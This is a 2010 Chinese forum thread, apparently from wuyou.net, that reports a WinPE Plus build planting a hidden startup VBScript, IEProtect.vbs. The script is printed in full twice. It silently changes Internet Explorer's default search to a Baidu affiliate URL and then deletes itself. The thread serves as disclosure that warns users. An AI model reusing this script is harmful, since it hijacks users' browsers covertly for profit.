WinPE Plus's big problem

tanjianwen · 发表于 2010-5-16 10:26:28

Download from: http://bbs.wuyou.net/forum.php?mod=viewthread&tid=117016

Found a suspicious file after use in system:

%userprofile%\appdata\roaming\Micros~1\Windows\StartM~1\Programs\Startup\IEProtect.vbs
IEProtect.vbs

Set ws = CreateObject("Wscript.Shell")
ws.run "cmd /c reg add ""HKCU\Software\Microsoft\Internet Explorer\SearchScopes"" /v DefaultScope /d {57441393-1EAF-4587-B23F-60B1E960833F} /f",vbhide
ws.run "cmd /c reg add ""HKCU\Software\Microsoft\Internet Explorer\SearchScopes"" /v Version /t REG_DWORD /d 1 /f",vbhide
ws.run "cmd /c reg add ""HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{57441393-1EAF-4587-B23F-60B1E960833F}"" /v DisplayName /d baidu /f",vbhide
ws.run "cmd /c reg add ""HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{57441393-1EAF-4587-B23F-60B1E960833F}"" /v URL /d ""http://www.baidu.com/baidu?tn=winpe_pg&word={searchTerms}&ie=utf-8"" /f",vbhide
ws.run "cmd /c reg add ""HKLM\Software\Microsoft\Internet Explorer\SearchScopes"" /v DefaultScope /d {57441393-1EAF-4587-B23F-60B1E960833F} /f",vbhide
ws.run "cmd /c reg add ""HKLM\Software\Microsoft\Internet Explorer\SearchScopes\{57441393-1EAF-4587-B23F-60B1E960833F}"" /v DisplayName /d baidu /f",vbhide
ws.run "cmd /c reg add ""HKLM\Software\Microsoft\Internet Explorer\SearchScopes\{57441393-1EAF-4587-B23F-60B1E960833F}"" /v URL /d ""http://www.baidu.com/baidu?tn=winpe_pg&word={searchTerms}&ie=utf-8"" /f",vbhide
ws.run "cmd /c attrib -s -h -r -a ""%allusersprofile%\「开始」菜单\程序\启动\IEProtect.vbs""",vbhide
ws.run "cmd /c del ""%allusersprofile%\「开始」菜单\程序\启动\IEProtect.vbs"" /q",vbhide

[ 本帖最后由 tanjianwen 于 2010-5-16 03:30 编辑 ]

lxl1638 · 发表于 2010-5-16 11:10:16

原帖由 tanjianwen 于 2010-5-16 10:26 发表
Download from: http://bbs.wuyou.net/forum.php?mod=viewthread&tid=117016

Found a suspicious file after use in system:

%userprofile%\appdata\roaming\Micros~1\Windows\StartM~1\Programs\Startup\IEProte ...

网上找到的，别人的说法，不知对否。

很严重的问题，在启动WinPE后会在“C:\Documents and Settings\All Users\「开始」菜单\程序\启动”生成一个IEProtect.vbs，当你下次进入自己的windows后就会自动运行，内容如下

Set ws = CreateObject("Wscript.Shell")
ws.run "cmd /c reg add ""HKCU\Software\Microsoft\Internet Explorer\SearchScopes"" /v DefaultScope /d {57441393-1EAF-4587-B23F-60B1E960833F} /f",vbhide
ws.run "cmd /c reg add ""HKCU\Software\Microsoft\Internet Explorer\SearchScopes"" /v Version /t REG_DWORD /d 1 /f",vbhide
ws.run "cmd /c reg add ""HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{57441393-1EAF-4587-B23F-60B1E960833F}"" /v DisplayName /d baidu /f",vbhide
ws.run "cmd /c reg add ""HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{57441393-1EAF-4587-B23F-60B1E960833F}"" /v URL /d ""http://www.baidu.com/baidu?tn=winpe_pg&word={searchTerms}&ie=utf-8"" /f",vbhide
ws.run "cmd /c reg add ""HKLM\Software\Microsoft\Internet Explorer\SearchScopes"" /v DefaultScope /d {57441393-1EAF-4587-B23F-60B1E960833F} /f",vbhide
ws.run "cmd /c reg add ""HKLM\Software\Microsoft\Internet Explorer\SearchScopes\{57441393-1EAF-4587-B23F-60B1E960833F}"" /v DisplayName /d baidu /f",vbhide
ws.run "cmd /c reg add ""HKLM\Software\Microsoft\Internet Explorer\SearchScopes\{57441393-1EAF-4587-B23F-60B1E960833F}"" /v URL /d ""http://www.baidu.com/baidu?tn=winpe_pg&word={searchTerms}&ie=utf-8"" /f",vbhide
ws.run "cmd /c attrib -s -h -r -a ""%allusersprofile%\「开始」菜单\程序\启动\IEProtect.vbs""",vbhide
ws.run "cmd /c del ""%allusersprofile%\「开始」菜单\程序\启动\IEProtect.vbs"" /q",vbhide

从这里面可以看出，它开机自启动后会修改你的注册表，把你的默认搜索引擎换成百度的，并且整个过程是全部隐藏的，运行后会删除自身，所以你现在去“启动”那个文件夹看是看不到这个文件的
但是请注意这里“http://www.baidu.com/baidu?tn=winpe_pg&;word={searchTerms}&ie=utf-8”里面有个tn=winpe_pg，这才是关键所在，如果你不相信，可以进入WinPE，在WinPE中打开C:\Documents and Settings\All Users\「开始」菜单\程序\启动，看看是不是有这个文件

[ 本帖最后由 lxl1638 于 2010-5-16 11:12 编辑 ]

xianglang · 发表于 2010-5-16 11:35:31

没试过这个PE——看来做PE也可以赚钱啊，以前说做PE不赚钱，看来是不对的。 ~Q~~

		自动登录	找回密码
密码			注册

WinPE Plus's big problem

浏览过的版块